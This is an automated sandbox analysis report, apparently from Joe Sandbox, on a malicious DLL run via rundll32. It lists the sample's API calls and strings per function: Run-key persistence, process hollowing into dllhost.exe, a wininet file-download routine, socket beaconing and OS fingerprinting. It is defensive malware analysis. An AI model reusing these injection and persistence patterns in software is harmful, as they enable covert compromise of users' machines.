OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 041748D7
ExitProcess.KERNEL32 ref: 041748DF
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,?), ref: 041748FD
_memset.LIBCMT ref: 04174916
_memset.LIBCMT ref: 0417492E
_sprintf.LIBCMT ref: 04174940
lstrlenA.KERNEL32(00000000), ref: 041749D8
__time64.LIBCMT ref: 041749E9
__localtime64.LIBCMT ref: 041749F5
_memset.LIBCMT ref: 04174A0F
wsprintfA.USER32 ref: 04174A3B
CreateMutexA.KERNELBASE(00000000,00000001,xYYAgXEhxx), ref: 04174A5C
GetLastError.KERNEL32 ref: 04174A62

Strings

rolyer.update, xrefs: 0417494C, 041749B6
xYYAgXEhxx, xrefs: 04174A54
Time, xrefs: 041749CD, 04174A4A
False, xrefs: 041748C0
CopyC, xrefs: 04174AA9
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0417495C, 041749BB
Blocked, xrefs: 041748D2
"%s", xrefs: 0417493A
%d-%d-%d %d:%d, xrefs: 04174A35
Enable, xrefs: 041748B6

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _memset$Namewsprintf$ComputerCreateDebugErrorExitFileLastModuleMutexOutputProcessString__localtime64__time64_sprintflstrcpylstrlen
String ID: "%s"$%d-%d-%d %d:%d$Blocked$CopyC$Enable$False$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Time$rolyer.update$xYYAgXEhxx
API String ID: 258807487-782532684
Opcode ID: 70333dd6b92dfd6e4b180865ec4faa0bba63af259d0125d3a4e950335540887f
Instruction ID: 322d4f2bcebb4b07808ff5353e900e2fb0e5becac193a4ace0cbc5e86fe47744
Opcode Fuzzy Hash: 70333dd6b92dfd6e4b180865ec4faa0bba63af259d0125d3a4e950335540887f
Instruction Fuzzy Hash: 54610AF1944214ABE710EB60DCC4FEA777CEB04308F044598FA66A7141EB78BE88CB65

Function 04174D60 Relevance: 40.4, APIs: 15, Strings: 8, Instructions: 197
libraryloaderregistryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 04174DC6
_memset.LIBCMT ref: 04174DD9
_memset.LIBCMT ref: 04174DEC
LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,161FA605,?,Enable,?), ref: 04174DF9
GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04174E13
GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04174E21
GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 04174E2F
GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 04174E37
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04174E3F
RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?,?,?,?,?,161FA605,?,Enable,?), ref: 04174E6C
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,161FA605,?,Enable,?), ref: 04175003

Strings

RegEnumValueA, xrefs: 04174E29
%08X, xrefs: 04174FD3
ADVAPI32.dll, xrefs: 04174DF4
RegQueryValueExA, xrefs: 04174E07
RegOpenKeyExA, xrefs: 04174E1B
RegEnumKeyExA, xrefs: 04174E31
Enable, xrefs: 04174D8A
RegCloseKey, xrefs: 04174E39

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: AddressProc$_memset$Library$FreeLoadOpen
String ID: %08X$ADVAPI32.dll$Enable$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
API String ID: 1822379937-990719231
Opcode ID: 6960c7bac29a4abd73a9fd5ddc1baa21283c16ef544b9b8d33ba16020c793edf
Instruction ID: 88bb7691feac22eae931b75c124b4ec8f1d08a79185006e13bdae0c6d5b52fe9
Opcode Fuzzy Hash: 6960c7bac29a4abd73a9fd5ddc1baa21283c16ef544b9b8d33ba16020c793edf
Instruction Fuzzy Hash: FC711AB1A44228ABDB24DF55CCC9FAEB7BCFB48704F004199F519A6180DB74BA84CF51

Function 04175140 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 55
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0417515F
_memset.LIBCMT ref: 04175179
GetComputerNameA.KERNEL32(00000000,?), ref: 04175199
lstrcpyA.KERNEL32(00000000,UnKnow), ref: 041751AF
_memset.LIBCMT ref: 041751C3
wsprintfA.USER32 ref: 041751DB

Strings

UnKnow, xrefs: 041751A3
SOFTWARE\%s\, xrefs: 041751D5
2024-12-19 8:48, xrefs: 0417515A, 041751EE, 04175206
Enable, xrefs: 041751E8

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _memset$ComputerNamelstrcpywsprintf
String ID: 2024-12-19 8:48$Enable$SOFTWARE\%s\$UnKnow
API String ID: 1685617284-1412731634
Opcode ID: dd3cd0f605edd863eb4ed0221a371795323f05c37a306f8cb5abbf71a6cad542
Instruction ID: 30d3fd24544ed88c434b160afd7aed9a919a8770453dead5611a2d57804811d5
Opcode Fuzzy Hash: dd3cd0f605edd863eb4ed0221a371795323f05c37a306f8cb5abbf71a6cad542
Instruction Fuzzy Hash: 381194B5A903086BF720EB54CC89FDA7379EB44708F4044D9B715760C0EB75BB948B54

Function 041AE14D Relevance: 1.5, APIs: 1, Instructions: 47
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(0000C087,?,?,?,00000000,041AE0C7,?,?,?,?,?), ref: 041AE160

Memory Dump Source

Source File: 0000000B.00000002.2296201390.00000000041AE000.00000040.00001000.00020000.00000000.sdmp, Offset: 041AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_41ae000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
Instruction ID: 65f0a3b74819d763773ab95d7896e0c13cd4884105b131fbe6c6a0eb78bf1b2b
Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
Instruction Fuzzy Hash: B3F0FFBA7843328FEB148E54CCD897777E8EE81265B0A0868E842C7201F321F82087A0

Function 04178060 Relevance: 1.5, APIs: 1, Instructions: 15
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DisableThreadLibraryCalls.KERNEL32(?,?,?,04163EBC,?,?,?,?,?,?,0417C538,0000000C,04163F64,?), ref: 0417806E

Part of subcall function 041748A0: OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 041748D7
Part of subcall function 041748A0: ExitProcess.KERNEL32 ref: 041748DF

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: CallsDebugDisableExitLibraryOutputProcessStringThread
String ID:
API String ID: 825726465-0
Opcode ID: e723a52c15416d8b6df7d1eba17e888434024f1899093f9fc271e35085d775eb
Instruction ID: abb00065241bd037983d17f5349ea2c25ff08f6db99eba972b4e40609d08cd50
Opcode Fuzzy Hash: e723a52c15416d8b6df7d1eba17e888434024f1899093f9fc271e35085d775eb
Instruction Fuzzy Hash: 1BD0C97256152897DB10AF59A484ACA37BCEB19750F004016F9249B200C7B9FAD187E9

Function 04167925 Relevance: 1.5, APIs: 1, Instructions: 10
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,000000FF,?,0416B0DF,00000011,00000000,?,041648E3,0000000D,0417C5A0,00000008,041649DA,00000000), ref: 0416792E

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 624f8894d4783e5265dc1a03ccdb2783a84640135c37cae814d34913ba00737f
Instruction ID: e285c6fe1bf1a9ac15deb848d24382757a514cf5a49cea9cf68ca777f8962855
Opcode Fuzzy Hash: 624f8894d4783e5265dc1a03ccdb2783a84640135c37cae814d34913ba00737f
Instruction Fuzzy Hash: 67C09BB074130257F75447355C5AB4525D4D718752F210039B117D95C0DBA498E05604

Non-executed Functions

Function 04162000 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 73threadinjectionprocessCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0416201E
CreateProcessA.KERNEL32(00000000,dllhost.exe,00000000,00000000,00000000,00000044,00000000,00000000,?,?), ref: 04162051
GetThreadContext.KERNEL32(?,?), ref: 04162078
VirtualAllocEx.KERNEL32(?,00000000,00027400,00001000,00000040), ref: 04162093
WriteProcessMemory.KERNEL32(?,00000000,MZER,00027400,00000000), ref: 041620AF
SetThreadContext.KERNEL32(?,00010003), ref: 041620C9
ResumeThread.KERNEL32(?), ref: 041620D6
CloseHandle.KERNEL32(?), ref: 041620E9
CloseHandle.KERNEL32(?), ref: 041620F2

Strings

D, xrefs: 04162047
MZER, xrefs: 041620A8
dllhost.exe, xrefs: 04162040

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Thread$CloseContextHandleProcess$AllocCreateMemoryResumeVirtualWrite_memset
String ID: D$MZER$dllhost.exe
API String ID: 4271913790-2395381201
Opcode ID: a56f9088d4158cf9f3e5f50221940886a15c51d99b620523f94ec468062c5208
Instruction ID: a0b88788f6f9e3bf6e3eb6abf1361a30f263032625af4ca05c1a2f87e37b7f6b
Opcode Fuzzy Hash: a56f9088d4158cf9f3e5f50221940886a15c51d99b620523f94ec468062c5208
Instruction Fuzzy Hash: F0212FB1A90218ABEB209B64DC89F9A7778EB48744F1041C9B709B6180D7B4AE85CF54

Function 04174520 Relevance: 36.2, APIs: 24, Instructions: 212
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04177460: WSAStartup.WS2_32(00000202,?), ref: 041774B1
Part of subcall function 04177460: InitializeCriticalSection.KERNEL32(?), ref: 041774BE
Part of subcall function 04177460: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 041774C9
Part of subcall function 04177460: __time64.LIBCMT ref: 041774EC

GetTickCount.KERNEL32 ref: 04174586

Part of subcall function 04177B90: ResetEvent.KERNEL32(?,762323A0,?,?), ref: 04177BB3
Part of subcall function 04177B90: socket.WS2_32 ref: 04177BC6

Sleep.KERNEL32(0000EA60,00000000), ref: 041745C5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 041745FE
_memset.LIBCMT ref: 04174629
_strncpy.LIBCMT ref: 0417463F
GetTickCount.KERNEL32 ref: 04174664
GetTickCount.KERNEL32 ref: 04174675
setsockopt.WS2_32 ref: 041746B1
CancelIo.KERNEL32(?), ref: 041746BF
InterlockedExchange.KERNEL32(?,00000000), ref: 041746CF
closesocket.WS2_32(?), ref: 041746DD
SetEvent.KERNEL32(?), ref: 041746EB
Sleep.KERNEL32 ref: 04174707
Sleep.KERNEL32(00000BB8), ref: 04174721
CloseHandle.KERNEL32(?), ref: 0417473A
GetTickCount.KERNEL32 ref: 0417485C

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: CountEventTick$Sleep$Create$CancelCloseCriticalExchangeHandleInitializeInterlockedResetSectionStartup__time64_memset_strncpyclosesocketsetsockoptsocket
String ID:
API String ID: 2471061221-0
Opcode ID: f316e47a7cd7b5434b48bdd1c7c8bf58c282fba33316628d9d8697641c9966a7
Instruction ID: 0f9cbf6b437b20c49a3b8f9abf249d7b8ace4460a02f5a835d6738d112a3e19c
Opcode Fuzzy Hash: f316e47a7cd7b5434b48bdd1c7c8bf58c282fba33316628d9d8697641c9966a7
Instruction Fuzzy Hash: 1A817AB15583809BE324DF65D8C4BDBB7F4EB88708F00491DE69997280DB38A949CB92

Function 04173840 Relevance: 35.1, APIs: 6, Strings: 14, Instructions: 96libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,00000000), ref: 041738A8
GetProcAddress.KERNEL32(00000000), ref: 041738B1
LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 041738E4
GetProcAddress.KERNEL32(00000000), ref: 041738E7
LoadLibraryA.KERNEL32(Advapi32.dll,?), ref: 04173902
GetProcAddress.KERNEL32(00000000), ref: 04173905

Strings

aliz, xrefs: 04173897
niti, xrefs: 04173890
AndI, xrefs: 04173889
cate, xrefs: 04173882
kTok, xrefs: 041738C5
enMe, xrefs: 041738CC
mber, xrefs: 041738D3
eSid, xrefs: 0417389E
ship, xrefs: 041738DA
Allo, xrefs: 0417387B
Free, xrefs: 041738F4
Advapi32.dll, xrefs: 041738BA, 041738BD
Chec, xrefs: 041738BE
Sid, xrefs: 041738FB

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Advapi32.dll$Allo$AndI$Chec$Free$Sid$aliz$cate$eSid$enMe$kTok$mber$niti$ship
API String ID: 2574300362-3168299024
Opcode ID: 6124132b63881c15215c2e24155f0c79fd467aa69bdbcff54966b4722bb96163
Instruction ID: e5ebefb536e5a1e74d9ec5342735818825966d38019755621f813c42719c533d
Opcode Fuzzy Hash: 6124132b63881c15215c2e24155f0c79fd467aa69bdbcff54966b4722bb96163
Instruction Fuzzy Hash: D83100B2D0131CABDB00DFE9D985AEEBBB8FF08700F108159E505AB204DB745A05CFA5

Function 04175C20 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 181stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04175C42
_strrchr.LIBCMT ref: 04175C4A
_memset.LIBCMT ref: 04175C7E
_strrchr.LIBCMT ref: 04175C86
_memset.LIBCMT ref: 04175D12
wsprintfA.USER32 ref: 04175D2A
_memset.LIBCMT ref: 04175D3E
_memset.LIBCMT ref: 04175D58
ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 04175D9A
lstrcatA.KERNEL32(?,0417B7B4), ref: 04175DE2
lstrcatA.KERNEL32(?), ref: 04175DEC

Strings

D, xrefs: 04175E0F
%s\shell\open\command, xrefs: 04175D24
WinSta0\Default, xrefs: 04175E1B
"%1, xrefs: 04175DA6

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _memset$_strrchrlstrcat$EnvironmentExpandStringswsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 609515672-33419044
Opcode ID: e1f365a35ccd30dd29d336cf8c2c01b4edaf317a23e07d2f0b97bc0145458752
Instruction ID: 9b4f7ee45b9471d826129322a27748ad566004a468814344fe8e9685e39ad913
Opcode Fuzzy Hash: e1f365a35ccd30dd29d336cf8c2c01b4edaf317a23e07d2f0b97bc0145458752
Instruction Fuzzy Hash: CB51877198031C6BEB25DB64DDC5FEA77B99B04709F5040D8EA0AA61C0EBB4B788CF51

Function 04176F80 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 132libraryloaderfileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(04175B63,00000000,00000001,?), ref: 04176FA9
LoadLibraryA.KERNEL32(wininet.dll), ref: 04176FC2
GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 04176FD6
FreeLibrary.KERNEL32(00000000), ref: 04176FF4
GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 04177013
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04177046
_memset.LIBCMT ref: 0417706E
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0417707C
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 041770B2
CloseHandle.KERNEL32(?), ref: 041770C8
Sleep.KERNEL32(00000001), ref: 041770D0
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 041770DC
FreeLibrary.KERNEL32(00000000), ref: 041770F1

Strings

InternetOpenUrlA, xrefs: 0417700D
InternetReadFile, xrefs: 04177076
wininet.dll, xrefs: 04176FB1
MSIE 6.0, xrefs: 04176FDC
InternetCloseHandle, xrefs: 041770D6
InternetOpenA, xrefs: 04176FD0

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: AddressProc$FileLibrary$Free$CloseCreateDeleteHandleLoadSleepWrite_memset
String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$wininet.dll
API String ID: 455779405-4269851202
Opcode ID: a2820014e161eff43410e82ccdbf803a73a1d8402037898e6bb2e10c308b9cb3
Instruction ID: 7d792645d74016ce2f911a013c7fb69a2bf88b5e7535cb047a96176c61078ea5
Opcode Fuzzy Hash: a2820014e161eff43410e82ccdbf803a73a1d8402037898e6bb2e10c308b9cb3
Instruction Fuzzy Hash: 4F4162F5A50218ABE7209BA59CC5FDA73BCEB88704F104199F705A7180DB746E858F68

Function 04173970 Relevance: 28.1, APIs: 3, Strings: 13, Instructions: 96COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04173991
GetVersionExA.KERNEL32(?), ref: 041739AA
_strncpy.LIBCMT ref: 04173ACE

Strings

Windows 2000, xrefs: 041739CA
Windows 8.1 Update 1, xrefs: 04173A72
Unknown, xrefs: 04173AC8
Windows 2012, xrefs: 04173A4B
Windows 7 SP1, xrefs: 04173A2B
Windows XP, xrefs: 041739E2
Windows 2008 R2, xrefs: 04173A21
Windows 2012 R2, xrefs: 04173A6B
Windows 2019, xrefs: 04173AB0
Windows 10, xrefs: 04173ABC
Windows 8, xrefs: 04173A52
Windows 2016, xrefs: 04173AA2
Windows Vista SP2, xrefs: 04173A04

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: Version_memset_strncpy
String ID: Unknown$Windows 10$Windows 2000$Windows 2008 R2$Windows 2012$Windows 2012 R2$Windows 2016$Windows 2019$Windows 7 SP1$Windows 8$Windows 8.1 Update 1$Windows Vista SP2$Windows XP
API String ID: 1449955169-2950701659
Opcode ID: a960d9b6c2a6a5b7220d3c8ad0341d8a5cbad15220432cfe681eb73ff584f3e0
Instruction ID: 774354bdd06e4b115bbd9acf970170d3d797d4d4f3689d08e373ad58fbfe4d60
Opcode Fuzzy Hash: a960d9b6c2a6a5b7220d3c8ad0341d8a5cbad15220432cfe681eb73ff584f3e0
Instruction Fuzzy Hash: 0A311031B8831CA7EB3499608CC3F697670A700B08F5484D6ED2EE95C1EBA57984FE02

Function 04176880 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 105sleepthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04175140: _memset.LIBCMT ref: 0417515F
Part of subcall function 04175140: _memset.LIBCMT ref: 04175179
Part of subcall function 04175140: GetComputerNameA.KERNEL32(00000000,?), ref: 04175199
Part of subcall function 04175140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 041751AF
Part of subcall function 04175140: _memset.LIBCMT ref: 041751C3
Part of subcall function 04175140: wsprintfA.USER32 ref: 041751DB

_memset.LIBCMT ref: 041768C6
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,Time), ref: 041768DC
_strrchr.LIBCMT ref: 041768EB
_strtok.LIBCMT ref: 041768F9
wsprintfA.USER32 ref: 04176925
CreateThread.KERNEL32(00000000,00000000,04176200,00000000,00000000,00000000), ref: 0417698F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,Time), ref: 04176996
_strtok.LIBCMT ref: 041769AA
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,Time), ref: 041769C1

Strings

ARPD, xrefs: 04176894
%s\%s, xrefs: 0417691F
Time, xrefs: 04176893

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _memset$Name_strtokwsprintf$CloseComputerCreateFileHandleModuleSleepThread_strrchrlstrcpy
String ID: %s\%s$ARPD$Time
API String ID: 2842694341-2065597383
Opcode ID: 643eb0ef6b9faf268986163f48ab158adcf2ec63218d1f123866f11c51d10b07
Instruction ID: b9937949a22cc001f62d8fb4f00b5d8cf3cd3587615ae4338f280f8cc2961256
Opcode Fuzzy Hash: 643eb0ef6b9faf268986163f48ab158adcf2ec63218d1f123866f11c51d10b07
Instruction Fuzzy Hash: A431E471A44314AFEB10AB64CC81FDB77B8EB44715F0441D4E949AB181EBB4BA88CFA1

Function 04194EC8 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04194EEA
_strrchr.LIBCMT ref: 04194EF2
_memset.LIBCMT ref: 04194F26
_strrchr.LIBCMT ref: 04194F2E
_memset.LIBCMT ref: 04194FBA
_memset.LIBCMT ref: 04194FE6
_memset.LIBCMT ref: 04195000

Strings

D, xrefs: 041950B7

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _memset$_strrchr
String ID: D
API String ID: 3722325190-2746444292
Opcode ID: 89c303740c1add9219757045c392371c27dadc62f405e1885f2600a688bbd819
Instruction ID: a4ef4d8837fc4a46ecff2eeda056f4c6bc0ff979d30b993dfe99ddec5d10bce3
Opcode Fuzzy Hash: 89c303740c1add9219757045c392371c27dadc62f405e1885f2600a688bbd819
Instruction Fuzzy Hash: A751E7729443197BEF21EB648CC5FEA77B89B14705F4441C8E609AA1C0E770BB89CF91

Function 04175F20 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 126filestringthreadCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04175F62
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04175F89
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 04175FC6
CloseHandle.KERNEL32(00000000), ref: 04175FD1
wsprintfA.USER32 ref: 0417600D
lstrcpyA.KERNEL32(00000000,?), ref: 04176026
CreateThread.KERNEL32(00000000,00000000,Function_00015E80,00000000,00000000,00000000), ref: 04176067
CloseHandle.KERNEL32(00000000), ref: 0417606E

Strings

%s %s, xrefs: 04176007

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: CloseCreateFileHandle$ThreadWrite_memsetlstrcpywsprintf
String ID: %s %s
API String ID: 3904585434-2939940506
Opcode ID: d922e82382e9636fbddc5a32703a3012ac1b754c3eb7b61fd346200cbe31ca19
Instruction ID: fcf704222ba29e76608dcd0c4906edd221597a4326a385a9ad531ae2317e9206
Opcode Fuzzy Hash: d922e82382e9636fbddc5a32703a3012ac1b754c3eb7b61fd346200cbe31ca19
Instruction Fuzzy Hash: 54410672A44318ABEB319B649C88FEA777CFB44714F0401D8F50AA6080DB757B89CF91

Function 04177059 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57libraryloadersleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0417706E
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0417707C
